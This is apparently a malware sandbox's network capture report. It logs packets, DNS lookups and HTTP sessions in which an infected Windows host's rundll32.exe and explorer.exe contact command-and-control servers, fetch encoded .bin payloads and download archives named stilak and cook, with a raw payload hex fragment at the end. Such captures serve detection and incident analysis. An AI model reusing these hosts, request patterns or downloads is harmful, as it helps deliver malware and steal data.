May 4, 2022 16:21:21.500272036 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500299931 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500328064 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500358105 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500391960 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500422955 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500457048 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500510931 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500545979 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500576973 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500607967 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500636101 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500660896 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500685930 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500719070 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500751019 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500778913 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500808001 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500834942 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500863075 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
                                                        May 4, 2022 16:21:21.500894070 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500925064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500956059 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500983953 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501015902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501051903 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501082897 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501111031 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501137018 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501167059 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501200914 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501233101 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501255035 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501276970 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501307964 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501329899 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501351118 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501373053 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501394987 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501415968 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501437902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501458883 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501480103 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501501083 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501522064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501543045 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501564026 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501585960 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501607895 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501629114 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501651049 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501672983 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501693010 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501715899 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501738071 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501759052 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501780033 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501806974 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501828909 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501849890 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501871109 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501893044 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501915932 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501936913 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501959085 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501980066 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502002954 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502033949 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502058029 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502079964 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502101898 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502124071 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502146959 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502167940 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502188921 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502209902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502238989 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502264023 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502285957 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502307892 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502330065 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.513880968 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516669989 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516696930 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516701937 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516745090 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516783953 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516827106 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516874075 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516920090 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516930103 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516969919 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517009974 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517088890 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517097950 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517450094 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517458916 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.518587112 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.585875988 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586138964 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586164951 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586370945 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586836100 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.586899996 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.656141043 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656181097 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656213999 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656238079 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656265974 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656280994 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656306982 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656325102 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656349897 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656375885 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656399965 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656424046 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656445980 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.658230066 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.658262014 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.727454901 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727499008 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727524042 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727549076 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727574110 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.732424021 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:22.835144997 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:23.139252901 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:23.150166988 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:23.154438972 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:23.658023119 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:24.441509008 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:24.441524029 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:24.447551012 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:24.451337099 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:24.755420923 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:34.761866093 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.078103065 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:35.078289986 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.078524113 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.080523968 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.397073030 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:36.648550987 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:36.648611069 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:36.648708105 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:36.648760080 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:36.771807909 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:36.999512911 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:37.087958097 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:37.320596933 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:37.324688911 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:37.325897932 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:37.850003958 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:38.620135069 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:38.620167017 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:38.620332956 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:38.678212881 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:38.998575926 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:22:26.437941074 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:22:26.439583063 CEST4982380192.168.2.4193.56.146.127
Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 4, 2022 16:22:28.391390085 CEST | 192.168.2.4 | 8.8.8.8 | cff2 | (Port unreachable) | Destination Unreachable
May 4, 2022 16:22:29.407473087 CEST | 192.168.2.4 | 8.8.8.8 | cff2 | (Port unreachable) | Destination Unreachable
May 4, 2022 16:22:31.437877893 CEST | 192.168.2.4 | 8.8.8.8 | cff2 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2022 16:20:28.160969973 CEST | 192.168.2.4 | 8.8.8.8 | 0x78a7 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
May 4, 2022 16:20:28.271305084 CEST | 192.168.2.4 | 208.67.222.222 | 0x1 | Standard query (0) | 222.222.67.208.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.291598082 CEST | 192.168.2.4 | 208.67.222.222 | 0x2 | Standard query (0) | myip.opendns.com | A (IP address) | IN (0x0001)
May 4, 2022 16:20:28.500524998 CEST | 192.168.2.4 | 208.67.222.222 | 0x3 | Standard query (0) | myip.opendns.com | 28 | IN (0x0001)
May 4, 2022 16:21:22.481286049 CEST | 192.168.2.4 | 8.8.8.8 | 0x82a5 | Standard query (0) | cabrioxmdes.at | A (IP address) | IN (0x0001)
May 4, 2022 16:21:34.199577093 CEST | 192.168.2.4 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:21:34.217381001 CEST | 192.168.2.4 | 8.8.8.8 | 0x2 | Standard query (0) | 1.0.0.127.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:22:22.387646914 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
May 4, 2022 16:22:23.374944925 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
May 4, 2022 16:22:24.391297102 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
May 4, 2022 16:22:26.422003031 CEST | 192.168.2.4 | 8.8.8.8 | 0x5bcd | Standard query (0) | gamexperts.net | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2022 16:20:28.177081108 CEST | 8.8.8.8 | 192.168.2.4 | 0x78a7 | No error (0) | resolver1.opendns.com | | 208.67.222.222 | A (IP address) | IN (0x0001)
May 4, 2022 16:20:28.287652969 CEST | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.287652969 CEST | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.287652969 CEST | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:20:28.307825089 CEST | 208.67.222.222 | 192.168.2.4 | 0x2 | No error (0) | myip.opendns.com | | 102.129.143.40 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.077512026 CEST | 8.8.8.8 | 192.168.2.4 | 0x4708 | No error (0) | l-0007.l-dc-msedge.net | | 13.107.43.16 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 116.121.62.237 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 175.126.109.15 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 37.75.50.246 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 110.14.121.125 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 187.190.48.60 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 148.0.88.95 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 183.78.205.92 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 178.31.115.10 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 187.212.195.33 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:22.822657108 CEST | 8.8.8.8 | 192.168.2.4 | 0x82a5 | No error (0) | cabrioxmdes.at | | 91.139.196.113 | A (IP address) | IN (0x0001)
May 4, 2022 16:21:34.216151953 CEST | 8.8.8.8 | 192.168.2.4 | 0x1 | No error (0) | 8.8.8.8.in-addr.arpa | | | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:21:34.233515024 CEST | 8.8.8.8 | 192.168.2.4 | 0x2 | Name error (3) | 1.0.0.127.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
May 4, 2022 16:22:27.404277086 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
May 4, 2022 16:22:28.391235113 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
May 4, 2022 16:22:29.407274961 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
May 4, 2022 16:22:31.437788963 CEST | 8.8.8.8 | 192.168.2.4 | 0x5bcd | Server failure (2) | gamexperts.net | none | none | A (IP address) | IN (0x0001)
                                                        • 185.189.151.28
                                                        • 193.56.146.127
                                                        • cabrioxmdes.at
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49761 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2022 16:19:17.575335979 CEST | 1167 | OUT | GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
May 4, 2022 16:19:17.863269091 CEST | 1168 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 04 May 2022 14:19:17 GMT
Content-Type: application/octet-stream
Content-Length: 186001
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="62728b65cf5d2.bin"
                                                        May 4, 2022 16:19:18.765868902 CEST | 1367 | OUT | GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:19.058303118 CEST | 1368 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:19 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 238738
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b670adf7.bin"
                                                        May 4, 2022 16:19:19.326271057 CEST | 1619 | OUT | GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:19.626909018 CEST | 1620 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:19 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1856
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b6793eb1.bin"


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        1 | 192.168.2.4 | 49823 | 193.56.146.127 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 4, 2022 16:21:18.561359882 CEST | 11244 | OUT | GET /stilak32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:18.631387949 CEST | 11245 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:18 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 345746
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-54692"
                                                        Accept-Ranges: bytes
                                                        May 4, 2022 16:21:19.983093977 CEST | 11604 | OUT | GET /stilak64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:20.052925110 CEST | 11605 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:20 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 482456
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-75c98"
                                                        Accept-Ranges: bytes
                                                        May 4, 2022 16:21:20.986284018 CEST | 12097 | OUT | GET /cook32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.056226969 CEST | 12098 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 340630
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-53296"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 6d 89 b6 ca 2a ed 42 3d 7d 47 d0 53 23 32 6f 53 6a 18 43 e5 c9 c2 0c 08 3c 98 eb e5 5a fa 10 6b 57 26 bc 9b f0 a5 12 7a 6c 04 9f 5a 67 bf da 73 38 dc 4f f9 57 6f 44 87 6a 61 4c 28 46 19 8a 17 c0 a1 29 d4 cb d9 7f df 5b 7c 63 f5 13 a1 14 71 6d 42 2e b2 f5 59 29 7c 87 a1 85 d4 1c 9b 3f ef a8 f6 e4 e5 fd 9c 77 6b 20 0a ef 83 e2 4b 0a 08 c3 2a d3 f8 29 c9 6f c3 69 e9 5d 3e 42 1c c2 51 2c b5 2a 1c 83 56 42 6e 66 c9 a9 37 88 6e c8 92 7c 71 34 5e d0 9a 79 dd f4 a2 c9 6c c3 09 ee fb a8 1b 7c 8a 32 22 e3 f7 3d 56 be e1 1b 69 76 c3 79 f0 46 77 7a a8 11 e3 c7 c0 53 1b 6b 6a 48 d1 85 31 39 dc fe 06 d6 e9 74 64 06 24 8a d0 8e 4b ff f4 e0 cf 12 83 f0 05 39 35 bb e3 f8 83 a9 dc bd ea da f6 e9 5f 80 4f 7a c4 55 e5 29 3e 8d d9 ac 0f 26 10 c0 c7 5f d6 e8 5f 6c 78 c7 e2 1e 1e d9 1c 3b bc 29 52 3c b6 c1 c3 b2 01 02 6a 02 c6 95 a6 72 ff df 84 59 a0 a0 db e2 e6 61 6b ba 2a 7d ee 05 0b 52 ad e3 1d 87 e3 c9 17 0a 40 aa f1 94 02 d5 33 eb d7 c3 f0 67 c4 1c 20 0d 95 ce 30 f5 d2 87 8d 40 8a ce 79 ed d6 bb 66 a3 f5 1c 4d 0a f7 5a 18 80 ed f6 bf 80 65 ba e9 43 dd 51 e1 b6 2c ca bd 55 f4 95 f9 92 ac 90 09 e9 f4 09 f5 39 a4 0e 4b f1 a5 83 6a 47 bb b6 4c 36 2a 21 5d e6 d8 72 78 53 fb d9 f7 f2 8d 9e 11 cb d0 8f 4a 21 bc 88 58 fe c1 f0 90 99 df 71 6b 54 3f f5 df d7 1f ad 34 ca c0 05 38 eb 6b 0e d7 a7 9b 5c dc d4 7e 5b 0a 34 fa a2 0e 99 8a e5 8d 14 fb d7 b1 7a 9e 07 60 aa 1b 77 b1 d0 f9 ab 5b f3 85 9c a1 4d be 42 b4 ae c2 71 be a8 9a 56 92 9d ea b6 58 bc 12 97 42 7b 22 d2 2c cf 6d a5 89 e2 82 96 94 dd 13 7b 7b 6d 9a c9 09 92 7d 64 83 ca 77 f7 cb 2f 1b b9 09 85 20 63 ca d9 45 9c 9c c7 0d 83 7b ff 7f ac 43 db 3f bd 63 b6 22 fd 6e 33 e3 6c 4b ae ad ae cc 87 37 65 d5 32 68 2e 23 95 b8 bc c8 86 